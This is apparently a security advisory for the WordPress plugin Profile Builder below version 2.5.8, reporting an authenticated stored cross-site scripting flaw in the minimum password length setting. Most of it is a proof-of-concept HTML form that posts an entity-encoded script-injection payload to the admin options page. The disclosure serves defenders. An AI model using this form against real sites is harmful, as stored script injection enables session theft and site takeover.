Profile Builder < 2.5.8 – Authenticated Stored Cross-Site Scripting (XSS)

Description

Stored Cross-Site Scripting (XSS) in field minimum password length.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp/wp-admin/options.php" method="POST">
      <input type="hidden" name="option&#95;page" value="wppb&#95;general&#95;settings" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wpnonce" value="a37f914f93" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;profile&#45;builder&#45;general&#45;settings" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;extraFieldsLayout&#93;" value="default" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;emailConfirmation&#93;" value="no" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;activationLandingPage&#93;" value="" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;loginWith&#93;" value="usernameemail" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;length&#93;" value="8&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;strength&#93;" value="strong" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>